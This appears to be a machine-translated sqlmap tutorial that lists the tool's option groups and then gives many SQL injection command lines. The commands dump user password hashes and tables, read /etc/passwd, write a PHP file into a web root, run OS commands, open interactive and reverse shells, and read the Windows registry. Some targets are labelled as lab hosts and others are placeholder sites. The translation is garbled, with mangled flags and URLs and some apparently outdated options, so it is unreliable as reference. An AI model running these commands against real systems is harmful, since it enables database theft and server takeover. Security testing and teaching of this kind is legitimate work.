sqlmap tab and introduce common statement

sqlmap of use: python sqlmap.py [options];

sqlmap in a total of sixteen the following tabs:

1. Help tab;

2.Target (Target tab);

3.Request (Request tab);

4.Optimization (Optimization tab);

5.Injection (injection tab);

6.Detection (probe tab);

7.Techniques (implantation tab);

8.Fingerprint (fingerprint tab);

9.Enumeration (column data tab);

10. Brute force (blasting tab);

11. User-defined function injection (injection user-defined function tab);

12. File system access (operating system files tab);

13. Operation system access (Operating System Access tab);

14. Windows registry access (Windows Registry tab);

15. General (General tab);

16. Miscellaneous（杂项）；

1. Help tab

• -h, -help displays basic help information and exit;
• -hh further display help information and exit;
• -version show version of the program and exit;
• -v VERBOSE level of detail: 0-6 (default is 1);

2, Target (Target tab): At least one target to be set in these tabs

• -d DIRECT directly connected to the database;
• -u URL, -url = URL Goal URL;
• -l LOGFILE resolve the destination or from Burp WebScarab agent;
• -m BULKFILE scan target in a given text file;
• -r REQUESTFILE loading an HTTP request from a file;
• -g GOOGLEDORK use GOOGLEDORK acquiring a target URL;
• -c CONFIGFILE load options from a configuration INI file;

3, Request (Request tab): These options can be used to specify how to connect to the target URL.

•  -data = DATA transmitted via the POST data string;
• -param-del = PDEL parameter values ​​for character segmentation (GET or POST when data needs to be divided by other characters test parameters need this parameter.);
• –cookie=COOKIE                  HTTP Cookie 头；
• -cookie-del = CDEL character value for the cookie division;
• -load-cookies = L .. contained in the cookie file Netscape / wget format;
• -drop-set-cookie ignore the Set-Cookie header of the response;
• –user-agent=AGENT             HTTP User-Agent 头；
• -random-agent using a randomly selected HTTP User-Agent header;
• –host=HOST                          HTTP Host 头；
• –referer=REFERER               HTTP Referer 头；
• -headers = HEADERS additional headers (eg: "Accept-Language: fr \ nETag: 123");
• -auth-type = AUTH .. HTTP authentication type (Basic, Digest, NTLM or the PKI);
• -auth-cred = AUTH .. HTTP authentication credentials (name: password);
• -auth-private = A .. HTTP authentication PEM private key file;
• -proxy = PROXY Use a proxy server to connect to the target URL;
• -proxy-cred = PRO .. proxy authentication credentials (name: password);
• -proxy-file = PRO .. loading proxy list from a file;
• -ignore-proxy ignore the default proxy settings;
• -tor using the Tor anonymity network;
• -tor-port = TORPORT provided Tor proxy port other than the default;
• -tor-type = TORTYPE provided Tor proxy type (the HTTP (default), SOCKS4 or SOCKS5);
• -check-tor Tor check whether proper use;
• Second delay between -delay = DELAY each HTTP request;
• -timeout = TIMEOUT connection wait timeout (default 30 seconds);
• -retries = RETRIES attempts to connect timeout (default is 3);
• -randomize = RPARAM randomly change the value of the given parameter;
• -safe-url = URL address SAFURL during the test frequently accessed;
• -safe-freq = SAFREQ URL request to provide a safe access between the two;
• -skip-urlencode skip URL-encoded payload data;
• -force-ssl enforce SSL / HTTPS;
• -hpp using HTTP parameter pollution;
•  -eval = EVALCODE each time after finishing Request modified according to the written python code.

4, Optimization (Optimization tab): These options can be used to optimize the performance of SqlMap

• Open all switches -o optimization;
• -predict-output common query output forecast;
• -keep-alive using persistent HTTP (S) is connected;
• -null-connection no real page length to retrieve HTTP response;
• -threads = THREADS concurrent HTTP (S) requests the maximum number (default 1).

5, Injection (injection Tab): These options can be used to specify which parameters to test provides a general injection and optional modifiable script injection

• -p TESTPARAMETER parameters can be tested;
• -skip = SKIP skip a given parameter;
• -dbms = DBMS database type specified;
• -dbms-cred = DBMS .. database authentication credentials (user: password);
• -os = OS specified operating system database;
• -invalid-bignum specify an invalid large numbers;
• -invalid-logical specify an invalid logical operation;
• -no-cast close the payload configuration mechanism;
• -no-escape character escape mechanism is closed;
• -prefix = PREFIX injection prefix string payload;
• -suffix = SUFFIX Suffix injection payload;
• -tamper = TAMPER used to modify the data given script injection.

6, Detection (detection tab): These options can be used to customize the detection phase

• -level = LEVEL Level tested (1-5, default 1);
• The level of risk -risk = RISK tested (0-3, default is 1);
• When -string = STRING string matching the query to be evaluated is True; if
• -not-string = NOT .. is evaluated as False string matching the query;
• When -regexp = REGEXP regular expression matching the query is evaluated as True;
• -code = CODE HTTP code to match the query to be evaluated is True; if
• -text-only comparison is based solely on the contents page of text;
• -titles only based on comparison of the contents of the Title.

7, Techniques (implantation tab): These options can be used to adjust the specific SQL injection test

• -technique = TECH using SQL injection technique (default "BEUSTQ");
• -time-sec = TIMESEC DBMS response delay (default 5 seconds);
• -union-cols = UCOLS SQL UNION queries injection range of the test columns;
• -union-char = UCHAR UNION query character set used;
• -union-from = UFROM (Update needed);
• -dns-domain = DNS .. DNS domain name for the overflow attack;
• -second-order = S .. Sometimes injection point input data when the result is not returned to see the current page, but an additional page, this time on the need to specify which page acquired in response to the true and false judgment.

8, Fingerprint (fingerprint tab)

• -f, -fingerprint demonstrate a wide range of DBMS version fingerprints.

9, Enumeration (column data tab): These options can be used to enumerate database management system information, table structure and data, you can also run your own SQL statements

• -a, -all enumerate all;
• -b, -banner the DBMS to retrieve information banner;
• -current-user retrieves the current user of the DBMS;
• -current-db retrieve the current database DBMS;
• -Hostname host name of the server to retrieve the DBMS;
• -is-dba detect whether the current user is the DBA;
• -users enumeration DBMS users;
• -passwords enumeration DBMS user password hashes;
• -privileges enumeration DBMS user rights;
• -roles enumeration DBMS user roles;
• -dbs enumeration DBMS database;
• -tables enumeration DBMS database tables;
• -columns enumeration DBMS database tables and columns
• -schema enumeration DBMS schema;
• -count number retrieval table;
• -dump dumps DBMS database entry;
• -dump-all dump all database DBMS table entries;
• -search search columns, tables, and \ or database name;
• -comments retrieve DBMS opinion;
• -D DB DBMS database specified enumeration;
• -T TBL specified table enumeration DBMS database;
• -C COL column designated enumeration DBMS database;
• -U USER specified DBMS user enumeration;
• -exclude-sysdbs negative DBMS database system enumeration table;
• -start = LIMITSTART start specified output;
• -stop = LIMITSTOP specified output end;
• -first = FIRSTCHAR specified character output start;
• -last = LASTCHAR starting end of the specified output;
• -sql-query = SQL QUERY statement to be executed;
• -sql-shell prompt an interactive SQL shell;
• -sql-file = SQLFILE execute SQL statements from the given file.

10, Brute force (blasting tab): These options can be used to run checks violence

• Common table -common-tables present inspection;
• -common-columns check for the presence of common columns.

11, User-defined function injection (injecting a user-defined function tab): These options can be used to create user-defined functions

• -udf-inject injection user-defined function;
•  -shared-lib = SHLIB local path shared library.

12, File system access (system files action tabs): These options can be used for file system access back-end database management system-related

• -file-read = RFILE read files from the backend DBMS file system;
• -file-write = WFILE write a file on the local file system DBMS backend;
• -file-dest = DFILE back-end DBMS absolute file path is written.

13, Operation system access (Operating System Access tab): These options can be used to access the operating system-related back-end database management system

• -os-cmd = OSCMD execute operating system commands;
• -os-shell prompt an interactive operating system shell;
• -os-pwn as OOB shell, meterpreter or VNC prompts;
• -os-smbrelay Click to OOB shell, meterpreter or VNC prompted to enter;
• -os-bof stored procedure buffer overflow;
• -Priv-esc database user privilege escalation process;
• -msf-path = MSFPATH Metasploit local path of the mounting frame;
• -tmp-path = absolute path TMPPATH remote temporary file directory.

14, Windows registry access (Windows Registry tab): These options can be used to access the back-end database management system Windows Registry

• -reg-read reads a Windows registry key value;
• Writing a Windows registry key value data -reg-add;
• -reg-del delete Windows registry keys;
• -reg-key = REGKEY Windows registry keys;
• -reg-value = REGVAL Windows registry keys;
• -reg-data = key value data REGDATA Windows registry;
• -reg-type = value type REGTYPE Windows registry keys.

15, General (general tab): These options can be used to set some general operating parameters

• -s SESSIONFILE session is loaded from a storage file;
• -t TRAFFICFILE log all HTTP traffic to a text file;
• -batch does not require user input, the default behavior
• -charset = CHARSET retrieved using the character code data
• -crawl = CRAWLDEPTH grab URL from the target site;
• -csv-del = CSVDEL use of characters separated CSV output (default ",");
• -dump-format = DU .. dump data format (the CSV (default), HTML, or the SQLite);
• -eta each output display estimated time of arrival;
• -flush-session clear the current session file objectives;
• -forms target URL parsing and test forms;
• -fresh-queries will ignore the query results are stored in the session file;
• -hex DBMS using hexadecimal data retrieval function;
• -output-dir = ODIR custom directory path output;
• -parse-errors in response to parse and display an error message DBMS;
• -pivot-column = P .. key column name;
• -save configuration INI file saving option;
• -scope = SCOPE regular expressions to filter the target agent log provided;
• -test-filter = TE .. testing to select effective payload;
• -update update SQLMAP.

16、Miscellaneous（杂项）

•  -z MNEMONICS using short mnemonics;
• -alert = ALERT found when running the host operating system commands SQL injection;
• -answers = ANSWERS set answers to questions;
• -beep found that doing a beep when SQL injection;
• -check-waf heuristic check WAF / IPS / IDS protection;
• -cleanup clean up SqlMap in particular DBMS UDF and tables;
• -dependencies check for missing SqlMap dependence;
• Console Output disable -disable-coloring colorant;
• -gpage = GOOGLEPAGE use the Google search results specified page;
• -identify-waf of WAF / IPS / IDS tested to make a protection;
• -mobile imitate smartphone via HTTP User-Agent header;
• -page-rank display page PR value of google search results;
• -purge-output safely remove all the contents of the output directory;
• -smart only know heuristic test;
• A simple wizard interface -wizard primary user.

Common statement:

1, using the POST method to submit

sqlmap.py -u "http://192.168.1.1/sqlmap/oracle/post_int.php" --method POST --data "id=1"

2, using COOKIES submission, with the value of the cookie; split, cookies may be used to grasp TamperData

python sqlmap.py -u "http://192.168.1.1/sqlmap/mssql/cookie_int.php" --cookie "id=1" -v 1

3, using the referer spoofing

python sqlmap.py -u "http://192.168.1.1/sqlmap/pgsql/get_int.php?id=1" --referer "http://www.google.com" -v 3

4, using a custom user-agent, or to use its own random user-agents.txt

python sqlmap.py -u "http://192.168.1.1/sqlmap/oracle/get_int.php?id=1" --user-agent "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" -v 3

python sqlmap.py -u "URL" -v 1 -a "./txt/user-agents.txt"

5, using basic authentication

python sqlmap.py -u "http://192.168.1.1/sqlmap/mysql/basic/get_int.php?id=1" --auth-type Basic --auth-cred "testuser:testpass" -v 3

6, using Digest Authentication

python sqlmap.py -u "http://192.168.1.1/sqlmap/mysql/digest/get_int.php?id=1" --auth-type Digest --auth-cred "testuser:testpass" -v 3

7, using a proxy, with the TOR

python sqlmap.py -u "http://192.168.1.1/sqlmap/pgsql/get_int.php?id=1" --proxy "http://192.168.1.47:3128"

python sqlmap.py -u "http://192.168.1.1/sqlmap/pgsql/get_int.php?id=1" --proxy "http://192.168.1.47:8118"

8, the use of multi-threading guess

python sqlmap.py -u "http://192.168.1.1/sqlmap/mysql/get_int.php?id=1" -v 1 --current-user --threads 3

9, bypassing motion detection, directly specifying an injection point parameters may be used, dividing the plurality of parameters, user-agent specified injection

python sqlmap.py -u "http://192.168.1.1/sqlmap/pgsql/get_int.php?id=1" -v 1 -p "id

python sqlmap.py -u "http://192.168.1.1/sqlmap/pgsql/get_int.php?id=1&cat=2" -v 1 -p "cat,id"

python sqlmap.py -u "http://192.168.1.1/sqlmap/mysql/ua_str.php" -v 1 -p "user-agent" --user-agent "sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)"

10, the specified database, bypassing the automatic detection SQLMAP

python sqlmap.py -u "http://192.168.1.1/sqlmap/pgsql/get_int.php?id=1" -v 2 --dbms "PostgreSQL"

* MySQL

* Oracle

* PostgreSQL

* Microsoft SQL Server

11, specify the operating system, bypassing the automatic detection SQLMAP

python sqlmap.py -u "http://192.168.1.1/sqlmap/pgsql/get_int.php?id=1" -v 2 --os "Windows"

* Linux

* Windows

12, custom payload

Options: --prefix and --postfix

13, page Compare

python sqlmap.py -u "http://192.168.1.1/sqlmap/mysql/get_int_refresh.php?id=1" --string "luther" -v 1

python sqlmap.py -u "http://192.168.1.1/sqlmap/mysql/get_int_refresh.php?id=1" --regexp "<td>lu[\w][\w]er" -v

14, excluding the content of the site

python sqlmap.py -u "http://192.168.1.1/sqlmap/mysql/get_int_refresh.php?id=1" --excl-reg "Dynamic content: ([\d]+)"

15, multi-statement tests, php nested function mysql_query (), does not support multi-statement

python sqlmap.py -u "http://192.168.1.1/sqlmap/mysql/get_int.php?id=1" --stacked-test -v 1

16, union injection test

python sqlmap.py -u "http://192.168.1.1/sqlmap/oracle/get_int.php?id=1" --union-test -v 1

17, unionz injection with orderby

python sqlmap.py -u "http://192.168.1.1/sqlmap/pgsql/get_str.php?id=1" --union-test --union-tech orderby -v 1

python sqlmap.py -u "http://192.168.1.1/sqlmap/mssql/get_int.php?id=1" -v 1 --union-use --banner

python sqlmap.py -u "http://192.168.1.1/sqlmap/mysql/get_int.php?id=1" -v 5 --union-use --current-user

python sqlmap.py -u "http://192.168.1.1/sqlmap/mysql/get_int_partialunion.php?id=1" -v 1 --union-use --dbs

fingerprint

python sqlmap.py -u "http://192.168.1.1/sqlmap/mssql/get_int.php?id=1" -v 1 -f

python sqlmap.py -u "http://192.168.123.36/sqlmap/get_str.asp?name=luther" -v 1 -f -b

# This simple injection process in part from: network security attack and defense Laboratory (www.91ri.org)

1. read the database version, the current user, the current database

sqlmap -u http://www.91ri.org/ test.php?p=2 -f -b –current-user –current-db -v 1

2. determine the current database user rights

sqlmap -u http://www.91ri.org/ test.php? p = 2 -privileges -U username -v 1

sqlmap -u http://www.91ri.org/ test.php? p = 2 -is-dba -U username -v 1

3. Read all database users or specify the database user's password

sqlmap -u http://www.91ri.org/ test.php?p=2 –users –passwords -v 2

sqlmap -u http://www.91ri.org/ test.php?p=2 –passwords -U root -v 2

4. Get all the databases

sqlmap -u http://www.91ri.org/ test.php?p=2 –dbs -v 2

5. Obtain all the tables in the specified database

sqlmap -u http://www.91ri.org/ test.php?p=2 –tables -D mysql -v 2

6. Obtain field specifies the database name in the specified table

sqlmap -u http://www.91ri.org/ test.php?p=2 –columns -D mysql -T users -v 2

7. acquiring specified data specified database table name specified field

sqlmap -u http://www.91ri.org/ test.php?p=2 –dump -D mysql -T users -C “username,password” -s “sqlnmapdb.log” -v 2

8.file-read read web files

sqlmap -u http://www.91ri.org/ test.php?p=2 –file-read “/etc/passwd” -v 2

9.file-write write files to web

sqlmap -u http://www.91ri.org/ test.php?p=2 –file-write /localhost/mm.php –file-dest /var/www/html/xx.php -v 2

sqlmap -u "http:? // url / news id = 1" --dbms "Mysql" -users # dbms specify the type of database

sqlmap -u "http:? // url / news id = 1" --users # column database users

sqlmap -u "http:? // url / news id = 1" --dbs # database column

sqlmap -u "http: // url / news id = 1?" --passwords # database user password

sqlmap -u "http:? // url / news id = 1" --passwords-U root -v 0 # Lists the specified database user password

sqlmap  -u  “http://url/news?id=1″   --dump  -C  “password,user,id”  -T “tablename”-D “db_name”

-start 1 -stop 20 # listed in the specified field, lists 20

sqlmap -u "http:? // url / news id = 1" --dump-all -v 0 # lists all the tables in all databases

sqlmap -u "http:? // url / news id = 1" --privileges # View Permissions

sqlmap -u "http: // url / news id = 1?" --privileges -U root # View the specified user rights sqlmap -u "http:? // url / news id = 1" -is-dba -v 1 # whether the database administrator sqlmap -u "http:? // url / news id = 1" -roles # enumerate database user roles

sqlmap -u "http:? // url / news id = 1" --udf-inject # import user-defined functions (acquisition system privileges!)

sqlmap -u "http:? // url / news id = 1" --dump-all -exclude-sysdbs -v 0 # lists all the tables in the current library

sqlmap -u "http:? // url / news id = 1" --union-cols #union lookup table records

sqlmap -u “http://url/news?id=1″ --cookie “COOKIE_VALUE”#cookie注入

sqlmap -u "http:? // url / news id = 1" -b # obtain banner information

sqlmap -u “http://url/news?id=1″ --data “id=3″#post注入

sqlmap -u "http:? // url / news id = 1" -v 1 -f # fingerprint identification database type

sqlmap -u "http:? // url / news id = 1" --proxy "http://127.0.0.1:8118" # agent injection

sqlmap -u "http: // url / news id = 1?" --string "STRING_ON_TRUE_PAGE" # specify keywords

sqlmap -u "http: // url / news id = 1?" --sql-shell # sql execute the specified command

sqlmap -u “http://url/news?id=1″ --file /etc/passwd

sqlmap -u "http:? // url / news id = 1" --os-cmd = whoami # execute system commands

sqlmap -u "http: // url / news id = 1?" --os-shell # interact with the system shell sqlmap -u "http: // url / news id = 1?" -os-pwn # rebound shell

sqlmap -u "http:? // url / news id = 1" --reg-read # reads the system registry win

sqlmap -u "http: // url / news id = 1?" --dbs-o "sqlmap.log" # save progress

sqlmap -u "http:? // url / news id = 1" --dbs -o "sqlmap.log" -resume # restore saved progress